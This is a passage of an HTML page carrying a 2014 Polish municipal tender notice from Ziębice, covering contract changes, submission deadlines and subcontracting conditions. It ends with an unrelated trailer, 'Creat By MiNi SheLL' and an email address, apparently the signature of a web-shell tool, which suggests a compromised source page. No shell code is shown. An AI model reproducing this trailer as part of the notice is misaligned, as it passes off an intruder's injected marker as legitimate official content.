2.	Powyższe postanowienia stanowią katalog zmian na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 
3.	Zmiana umowy może nastąpić na pisemny umotywowany wniosek jednej ze stron, za zgodą drugiej strony umowy, na podstawie aneksu do umowy.
4.	Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ziebice.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ziębicach przy  ul. Przemysłowej 10, 57-220 Ziębice  (II piętro - pok. Nr 20b).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2014 godzina 10:00, miejsce: Urząd Miejski w Ziębicach przy  ul. Przemysłowej 10, 57-220 Ziębice  (sekretariat I piętro - pok. Nr 10).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	ZAMAWIAJĄCY NIE PRZEWIDUJE ZAWARCIA UMOWY RAMOWEJ
2.	ROZLICZENIA BĘDĄ PROWADZONE W WALUCIE PLN
3.	ZAMAWIAJĄCY NIE PRZEWIDUJE AUKCJI ELEKTRONICZNEJ
4.	ZAMAWIAJĄCY NIE PRZEWIDUJE WYMAGAŃ, O KTÓRYCH MOWA W ART. 29 UST. 4 USTAWY PRAWO ZAMÓWIEŃ PUBLICZNYCH
5.	INFORMACJA DOTYCZĄCA UDZIAŁU PODWYKONAWCÓW  W PRZEDMIOCIE ZAMÓWIENIA

1)	Przez umowę o podwykonawstwo należy rozumieć - umowę w formie pisemnej o charakterze odpłatnym, której przedmiotem są usługi, dostawy, lub roboty budowlane stanowiące część zamówienia publicznego, zawartą między wybranym przez zamawiającego wykonawcą a innym podmiotem (podwykonawcą) a w przypadku zamówień publicznych na roboty budowlane także między podwykonawcą lub między dalszymi podwykonawcami. 
2)	Zamawiający nie zastrzega zgodnie z art. 36a ust. 2 ustawy Pzp, że kluczową część zamówienia przedmiotowej roboty budowlanej musi wykonywać osobiście sam Wykonawca składający ofertę  a nie podwykonawca. 
3)	Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy
4)	Zamawiający żąda wskazania przez Wykonawcę części zamówienia, której wykonanie zamierza powierzyć podwykonawcy. Wskazanie w ofercie części zamówienia, której wykonanie Wykonawca powierzy podwykonawcom, winno nastąpić poprzez określenie jej rodzaju i zakresu. W przypadku braku takiego oświadczenia Zamawiający uzna, iż wykonawca będzie realizował zamówienie bez udziału podwykonawców.
5)	wymagania dotyczące umowy o podwykonawstwo, której przedmiotem są roboty budowlane, których niespełnienie spowoduje zgłoszenie przez zamawiającego odpowiednio zastrzeżeń lub sprzeciwu, jeżeli zamawiający określa takie wymagania, 
a)	projekt umowy/ umowa o roboty budowlane musi wyraźnie wskazać zakres tych robót. 
b)	zakres prac zleconych do wykonania podwykonawcy i dalszemu podwykonawcy musi być zgodny z zakresem robót wynikającym z kosztorysu ofertowego wykonawcy.
c)	projekt umowy/ umowa musi uwzględniać przepisy dotyczące gwarancji           i rękojmi wskazane w SIWZ. 
d)	projekt umowy/umowa musi zawierać warunki odbioru robót oraz postanowienia dotyczące stwierdzenia w trakcie odbioru wad lub usterek,
e)	projekt umowy/umowa musi uwzględniać kary umowne min. za zwłokę            w wykonaniu przedmiotu umowy, za zwłokę w zakończeniu wykonywania przedmiotu umowy, 	za opóźnienie w usunięciu wad stwierdzonych w okresie gwarancji i rękojmi 
f)	projekt umowy/ umowa musi spełniać wymagania określone w specyfikacji istotnych warunków zamówienia wraz z wszystkimi załącznikami oraz  przewidywać termin zapłaty wynagrodzenia nie dłuższy niż 30 dni..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com